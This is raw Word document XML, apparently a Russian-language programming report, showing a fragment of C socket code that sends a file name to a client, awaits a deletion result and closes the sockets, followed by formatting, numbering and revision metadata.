      <w:r w:rsidRPr="007026D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E30D54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273977A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7871F7A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75CF6468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// Отправляем имя файла (всегда 100 байт, даже если строка короче)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BE8D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send(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FileName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B311C28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</w:p>
    <w:p w14:paraId="56121B5F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// Ждём ответ от клиента (успех/ошибка удаления)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB0FAA2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recv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Res, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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(Res),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38BDAA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printf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026D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"%s\n"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, Res);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774F8B7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1A6FFF2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B5AFF8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026D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// Закрываем оба сокета (серверный и клиентский)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2C9AC1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closesocket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(Socket);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5939B9E6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closesocket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ClientSocket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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69D99F4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026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026D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026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727E09C" w14:textId="77777777" w:rsidR="007026D3" w:rsidRPr="007026D3" w:rsidRDefault="007026D3" w:rsidP="007026D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026D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2C6E27D" w14:textId="7363C8BE" w:rsidR="00E27E1E" w:rsidRPr="00E27E1E" w:rsidRDefault="00E27E1E" w:rsidP="007026D3">
      <w:pPr>
        <w:pStyle w:val="ac"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E27E1E" w:rsidRPr="00E27E1E" w:rsidSect="00D60F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D242" w14:textId="77777777" w:rsidR="00123113" w:rsidRPr="00D60F71" w:rsidRDefault="0012311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7923269" w14:textId="77777777" w:rsidR="00123113" w:rsidRPr="00D60F71" w:rsidRDefault="0012311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1B1D" w14:textId="77777777" w:rsidR="00822A02" w:rsidRDefault="00822A02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38692CB" w14:textId="77777777" w:rsidR="00822A02" w:rsidRPr="00C53ADA" w:rsidRDefault="00822A02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E042" w14:textId="77777777" w:rsidR="00822A02" w:rsidRDefault="00822A0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251A" w14:textId="77777777" w:rsidR="00123113" w:rsidRPr="00D60F71" w:rsidRDefault="0012311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B904B22" w14:textId="77777777" w:rsidR="00123113" w:rsidRPr="00D60F71" w:rsidRDefault="0012311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6987" w14:textId="77777777" w:rsidR="00822A02" w:rsidRDefault="00822A02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D2ECE" w14:textId="77777777" w:rsidR="00822A02" w:rsidRDefault="00822A02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F6B7" w14:textId="77777777" w:rsidR="00822A02" w:rsidRDefault="00822A02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591744200">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="804855094">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="691107045">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="803812829">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1222600320">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="2083599098">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1116674077">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1045370629">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="967324639">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="636187159">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1436826795">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="57900122">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="579872030">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1797286720">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="306907397">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="181169459">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1473790277">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1263957468">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2065327875">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="727605869">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="49305252">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1810051908">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="130291845">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1663268355">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1713192567">
    <w:abstractNumId w:val="19"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1865748388">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1396734202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0EE1"/>
    <w:rsid w:val="00035C4C"/>
    <w:rsid w:val="0003656F"/>
    <w:rsid w:val="00037127"/>
    <w:rsid w:val="0006172D"/>
    <w:rsid w:val="00063A15"/>
    <w:rsid w:val="0007080D"/>
    <w:rsid w:val="00090579"/>
    <w:rsid w:val="00095910"/>
    <w:rsid w:val="000A6AF6"/>
    <w:rsid w:val="000B1F41"/>
    <w:rsid w:val="000B5D9C"/>
    <w:rsid w:val="000C441E"/>
    <w:rsid w:val="000C7287"/>
    <w:rsid w:val="000D3DAE"/>
    <w:rsid w:val="000E5422"/>
    <w:rsid w:val="000F71FD"/>
    <w:rsid w:val="00105477"/>
    <w:rsid w:val="00123113"/>
    <w:rsid w:val="00123310"/>
    <w:rsid w:val="00151BEC"/>
    <w:rsid w:val="00162375"/>
    <w:rsid w:val="001832F5"/>
    <w:rsid w:val="001B1B03"/>
    <w:rsid w:val="001B32F7"/>
    <w:rsid w:val="001C5FFC"/>
    <w:rsid w:val="001D6F29"/>
    <w:rsid w:val="001E6E38"/>
    <w:rsid w:val="0020070E"/>
    <w:rsid w:val="00227300"/>
    <w:rsid w:val="002352C1"/>
    <w:rsid w:val="00241CFD"/>
    <w:rsid w:val="00241E94"/>
    <w:rsid w:val="002523D2"/>
    <w:rsid w:val="0025334A"/>
    <w:rsid w:val="00294C92"/>
    <w:rsid w:val="002B4EAC"/>
    <w:rsid w:val="002D0486"/>
    <w:rsid w:val="002D1672"/>
    <w:rsid w:val="002D5C58"/>
    <w:rsid w:val="002E1539"/>
    <w:rsid w:val="002E373A"/>
    <w:rsid w:val="002E7750"/>
    <w:rsid w:val="003044FB"/>
    <w:rsid w:val="00307EEF"/>
    <w:rsid w:val="00311EBF"/>
    <w:rsid w:val="00312B77"/>
    <w:rsid w:val="00321776"/>
    <w:rsid w:val="00327A23"/>
    <w:rsid w:val="00335556"/>
    <w:rsid w:val="00341A02"/>
    <w:rsid w:val="00356BD3"/>
    <w:rsid w:val="0036331B"/>
    <w:rsid w:val="003639B0"/>
    <w:rsid w:val="00371E39"/>
    <w:rsid w:val="0037417C"/>
    <w:rsid w:val="00384ECC"/>
    <w:rsid w:val="0038706C"/>
    <w:rsid w:val="0039351A"/>
    <w:rsid w:val="00394BF9"/>
    <w:rsid w:val="00395E78"/>
    <w:rsid w:val="003B2153"/>
    <w:rsid w:val="003B62DE"/>
    <w:rsid w:val="003B7418"/>
    <w:rsid w:val="003C218B"/>
    <w:rsid w:val="003D1DB9"/>
    <w:rsid w:val="003D414E"/>
    <w:rsid w:val="003D46CC"/>
    <w:rsid w:val="003E0B27"/>
    <w:rsid w:val="003E376E"/>
    <w:rsid w:val="003E4132"/>
    <w:rsid w:val="003E4C7B"/>
    <w:rsid w:val="00405A66"/>
    <w:rsid w:val="0040671E"/>
    <w:rsid w:val="00413C2C"/>
    <w:rsid w:val="004156CB"/>
    <w:rsid w:val="004329C7"/>
    <w:rsid w:val="00453CBA"/>
    <w:rsid w:val="004557D2"/>
    <w:rsid w:val="00475C3D"/>
    <w:rsid w:val="00497F6F"/>
    <w:rsid w:val="004A50CC"/>
    <w:rsid w:val="004B1FAA"/>
    <w:rsid w:val="004B295F"/>
    <w:rsid w:val="004B37E8"/>
    <w:rsid w:val="004B5CD2"/>
    <w:rsid w:val="004C60CF"/>
    <w:rsid w:val="004F2A89"/>
    <w:rsid w:val="004F7F88"/>
    <w:rsid w:val="00505E98"/>
    <w:rsid w:val="00516743"/>
    <w:rsid w:val="00516DFF"/>
    <w:rsid w:val="00543F39"/>
    <w:rsid w:val="00544F2D"/>
    <w:rsid w:val="00566711"/>
    <w:rsid w:val="005A5D30"/>
    <w:rsid w:val="005C1D47"/>
    <w:rsid w:val="005D2800"/>
    <w:rsid w:val="005D3951"/>
    <w:rsid w:val="005E4F2A"/>
    <w:rsid w:val="005F5D88"/>
    <w:rsid w:val="00601F8B"/>
    <w:rsid w:val="006456D8"/>
    <w:rsid w:val="00667E0D"/>
    <w:rsid w:val="00674524"/>
    <w:rsid w:val="006A41A2"/>
    <w:rsid w:val="006B3E75"/>
    <w:rsid w:val="006B4CA3"/>
    <w:rsid w:val="006C190B"/>
    <w:rsid w:val="006C7A54"/>
    <w:rsid w:val="006E2B77"/>
    <w:rsid w:val="006E3823"/>
    <w:rsid w:val="006E454C"/>
    <w:rsid w:val="006E7B40"/>
    <w:rsid w:val="006F5F48"/>
    <w:rsid w:val="007026D3"/>
    <w:rsid w:val="0070592F"/>
    <w:rsid w:val="0071183B"/>
    <w:rsid w:val="007246FB"/>
    <w:rsid w:val="0073727C"/>
    <w:rsid w:val="0074289A"/>
    <w:rsid w:val="00751CAC"/>
    <w:rsid w:val="0075210F"/>
    <w:rsid w:val="007716F8"/>
    <w:rsid w:val="007731B5"/>
    <w:rsid w:val="00773594"/>
    <w:rsid w:val="0078465D"/>
    <w:rsid w:val="007C378E"/>
    <w:rsid w:val="007D0609"/>
    <w:rsid w:val="007D3A85"/>
    <w:rsid w:val="007D5F18"/>
    <w:rsid w:val="007E2F92"/>
    <w:rsid w:val="00801922"/>
    <w:rsid w:val="008045D8"/>
    <w:rsid w:val="00820FFA"/>
    <w:rsid w:val="00822A02"/>
    <w:rsid w:val="008244CC"/>
    <w:rsid w:val="008302C7"/>
    <w:rsid w:val="00830F2D"/>
    <w:rsid w:val="00853432"/>
    <w:rsid w:val="008550E9"/>
    <w:rsid w:val="00856000"/>
    <w:rsid w:val="008746E9"/>
    <w:rsid w:val="008B1C72"/>
    <w:rsid w:val="008B3263"/>
    <w:rsid w:val="008D6C4D"/>
    <w:rsid w:val="008F501B"/>
    <w:rsid w:val="00906177"/>
    <w:rsid w:val="00907CF6"/>
    <w:rsid w:val="00917645"/>
    <w:rsid w:val="00917D90"/>
    <w:rsid w:val="00923E95"/>
    <w:rsid w:val="00930160"/>
    <w:rsid w:val="0093477C"/>
    <w:rsid w:val="0095140C"/>
    <w:rsid w:val="00961BBB"/>
    <w:rsid w:val="00966538"/>
    <w:rsid w:val="00983861"/>
    <w:rsid w:val="00984E4E"/>
    <w:rsid w:val="00985035"/>
    <w:rsid w:val="009909FF"/>
    <w:rsid w:val="00992DE0"/>
    <w:rsid w:val="009A77CB"/>
    <w:rsid w:val="009B1702"/>
    <w:rsid w:val="009B671C"/>
    <w:rsid w:val="009B708B"/>
    <w:rsid w:val="009C0CF1"/>
    <w:rsid w:val="009D0645"/>
    <w:rsid w:val="009F270C"/>
    <w:rsid w:val="009F5065"/>
    <w:rsid w:val="00A002D1"/>
    <w:rsid w:val="00A10DB5"/>
    <w:rsid w:val="00A11B14"/>
    <w:rsid w:val="00A2111C"/>
    <w:rsid w:val="00A2294E"/>
    <w:rsid w:val="00A233A8"/>
    <w:rsid w:val="00A56D79"/>
    <w:rsid w:val="00A61BC4"/>
    <w:rsid w:val="00A64183"/>
    <w:rsid w:val="00A86F01"/>
    <w:rsid w:val="00AD03E2"/>
    <w:rsid w:val="00AD24AD"/>
    <w:rsid w:val="00AE1D8A"/>
    <w:rsid w:val="00AE1FDE"/>
    <w:rsid w:val="00AE243B"/>
    <w:rsid w:val="00AE53D9"/>
    <w:rsid w:val="00B12380"/>
    <w:rsid w:val="00B13B4B"/>
    <w:rsid w:val="00B705BF"/>
    <w:rsid w:val="00B83129"/>
    <w:rsid w:val="00B86148"/>
    <w:rsid w:val="00B95B14"/>
    <w:rsid w:val="00B968FE"/>
    <w:rsid w:val="00BB7EBA"/>
    <w:rsid w:val="00BE19C9"/>
    <w:rsid w:val="00BE1C48"/>
    <w:rsid w:val="00C00B4D"/>
    <w:rsid w:val="00C174D6"/>
    <w:rsid w:val="00C212CE"/>
    <w:rsid w:val="00C33353"/>
    <w:rsid w:val="00C34406"/>
    <w:rsid w:val="00C36F05"/>
    <w:rsid w:val="00C469D8"/>
    <w:rsid w:val="00C5031D"/>
    <w:rsid w:val="00C524AA"/>
    <w:rsid w:val="00C53830"/>
    <w:rsid w:val="00C53ADA"/>
    <w:rsid w:val="00C6615B"/>
    <w:rsid w:val="00C77E41"/>
    <w:rsid w:val="00C8104B"/>
    <w:rsid w:val="00C93DCC"/>
    <w:rsid w:val="00CB4029"/>
    <w:rsid w:val="00CC75E2"/>
    <w:rsid w:val="00CD69E8"/>
    <w:rsid w:val="00D139C3"/>
    <w:rsid w:val="00D24CF4"/>
    <w:rsid w:val="00D32446"/>
    <w:rsid w:val="00D5217D"/>
    <w:rsid w:val="00D52829"/>
    <w:rsid w:val="00D60F71"/>
    <w:rsid w:val="00D6739C"/>
    <w:rsid w:val="00D740EB"/>
    <w:rsid w:val="00D916DC"/>
    <w:rsid w:val="00DB66C1"/>
    <w:rsid w:val="00DD3761"/>
    <w:rsid w:val="00E13401"/>
    <w:rsid w:val="00E1439F"/>
    <w:rsid w:val="00E27E1E"/>
    <w:rsid w:val="00E675B9"/>
    <w:rsid w:val="00E802CE"/>
    <w:rsid w:val="00E80FFE"/>
    <w:rsid w:val="00EA4EFD"/>
    <w:rsid w:val="00EC03D0"/>
    <w:rsid w:val="00EC06C5"/>
    <w:rsid w:val="00EC2E08"/>
    <w:rsid w:val="00EF4ADA"/>
    <w:rsid w:val="00F017C2"/>
    <w:rsid w:val="00F032D1"/>
    <w:rsid w:val="00F03722"/>
    <w:rsid w:val="00F2105D"/>
    <w:rsid w:val="00F30B10"/>
    <w:rsid w:val="00F40188"/>
    <w:rsid w:val="00F401C8"/>
    <w:rsid w:val="00F40380"/>
    <w:rsid w:val="00F41D65"/>
    <w:rsid w:val="00F52F00"/>
    <w:rsid w:val="00F570B7"/>
    <w:rsid w:val="00F67AC2"/>
    <w:rsid w:val="00F72418"/>
    <w:rsid w:val="00F7252F"/>
    <w:rsid w:val="00F72D85"/>
    <w:rsid w:val="00F7377D"/>
    <w:rsid w:val="00F74364"/>
    <w:rsid w:val="00F77A3F"/>
    <w:rsid w:val="00F91A1E"/>
    <w:rsid w:val="00FA32D6"/>
    <w:rsid w:val="00FB359E"/>
    <w:rsid w:val="00FB5D42"/>
    <w:rsid w:val="00FD038F"/>
    <w:rsid w:val="00FD3EED"/>
    <w:rsid w:val="00FD498F"/>
    <w:rsid w:val="00FE1B8E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85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Unresolved Mention"/>
    <w:basedOn w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E27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API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F%D1%80%D0%BE%D1%86%D0%B5%D1%81%D1%81_(%D0%B8%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0)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2615</Words>
  <Characters>14909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2020-09-18T09:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T20:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>